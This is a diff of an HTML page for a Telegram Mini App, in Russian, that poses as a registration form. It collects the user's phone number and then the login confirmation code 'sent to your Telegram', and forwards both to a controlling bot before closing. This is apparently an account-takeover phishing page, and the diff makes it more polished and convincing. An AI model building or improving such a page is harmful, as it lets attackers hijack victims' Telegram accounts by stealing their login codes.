--- a/index.html
+++ b/index.html
@@ -2,53 +2,108 @@
 <html lang="ru">
 <head>
     <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
     <script src="https://telegram.org"></script>
     <style>
-        body { font-family: sans-serif; background: var(--tg-theme-bg-color); color: var(--tg-theme-text-color); display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh; margin: 0; }
-        .container { width: 90%; text-align: center; }
-        input { width: 80%; padding: 12px; margin: 10px 0; border-radius: 10px; border: 1px solid #ccc; font-size: 16px; }
-        button { width: 85%; padding: 12px; border-radius: 10px; border: none; background: var(--tg-theme-button-color); color: var(--tg-theme-button-text-color); font-weight: bold; cursor: pointer; }
-        .hidden { display: none; }
+        :root {
+            --bg: var(--tg-theme-bg-color, #ffffff);
+            --text: var(--tg-theme-text-color, #222222);
+            --hint: var(--tg-theme-hint-color, #999999);
+            --btn: var(--tg-theme-button-color, #248bcf);
+            --btn-text: var(--tg-theme-button-text-color, #ffffff);
+        }
+        body {
+            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
+            background-color: var(--bg);
+            color: var(--text);
+            margin: 0;
+            display: flex;
+            flex-direction: column;
+            align-items: center;
+            justify-content: center;
+            height: 100vh;
+            overflow: hidden;
+        }
+        .step {
+            width: 80%;
+            text-align: center;
+            display: none;
+        }
+        .active { display: block; }
+        h2 { margin-bottom: 10px; }
+        p { color: var(--hint); font-size: 14px; margin-bottom: 20px; }
+        input {
+            width: 100%;
+            padding: 15px;
+            margin-bottom: 20px;
+            border-radius: 12px;
+            border: 1px solid #ccc;
+            background: #fdfdfd;
+            box-sizing: border-box;
+            font-size: 16px;
+        }
+        button {
+            width: 100%;
+            padding: 15px;
+            border-radius: 12px;
+            border: none;
+            background-color: var(--btn);
+            color: var(--btn-text);
+            font-size: 16px;
+            font-weight: bold;
+            cursor: pointer;
+        }
     </style>
 </head>
 <body>
-    <div class="container" id="phone-step">
+
+    <!-- ШАГ 1: НОМЕР ТЕЛЕФОНА -->
+    <div id="step-phone" class="step active">
         <h2>Регистрация</h2>
-        <p>Введите номер телефона</p>
-        <input type="tel" id="phone" placeholder="+79991234567">
-        <button onclick="sendPhone()">Продолжить</button>
+        <p>Введите ваш номер телефона для входа</p>
+        <input type="tel" id="phone_input" placeholder="+7 999 000-00-00">
+        <button onclick="submitPhone()">Продолжить</button>
     </div>
 
-    <div class="container hidden" id="code-step">
-        <h2>Подтверждение</h2>
-        <p>Введите код из Telegram</p>
-        <input type="number" id="code" placeholder="12345">
-        <button onclick="sendCode()">Войти</button>
+    <!-- ШАГ 2: КОД ПОДТВЕРЖДЕНИЯ -->
+    <div id="step-code" class="step">
+        <h2>Введите код</h2>
+        <p>Код подтверждения отправлен в ваш Telegram</p>
+        <input type="number" id="code_input" placeholder="12345">
+        <button onclick="submitCode()">Подтвердить</button>
     </div>
 
     <script>
         const tg = window.Telegram.WebApp;
+        tg.ready();
         tg.expand();
 
-        function sendPhone() {
-            const phone = document.getElementById('phone').value;
-            if(phone) {
-                tg.sendData("phone:" + phone); // Отправляем префикс, чтобы бот понял
-                document.getElementById('phone-step').classList.add('hidden');
-                document.getElementById('code-step').classList.remove('hidden');
+        function submitPhone() {
+            const phone = document.getElementById('phone_input').value.trim();
+            if (phone.length < 10) {
+                tg.showAlert("Введите корректный номер!");
+                return;
             }
+            // Отправляем префикс 'phone:', чтобы бот в Python понял, что это номер
+            tg.sendData("phone:" + phone);
+            
+            // Переключаем интерфейс на ввод кода
+            document.getElementById('step-phone').classList.remove('active');
+            document.getElementById('step-code').classList.add('active');
         }
 
-        function sendCode() {
-            const code = document.getElementById('code').value;
-            if(code) {
-                tg.sendData("code:" + code);
-                tg.close(); // Закрываем приложение после отправки кода
+        function submitCode() {
+            const code = document.getElementById('code_input').value.trim();
+            if (code.length < 4) {
+                tg.showAlert("Код слишком короткий!");
+                return;
             }
+            // Отправляем префикс 'code:', чтобы бот в Python понял, что это код
+            tg.sendData("code:" + code);
+            
+            // Закрываем Mini App
+            setTimeout(() => { tg.close(); }, 500);
         }
     </script>
 </body>
 </html>
-
- 
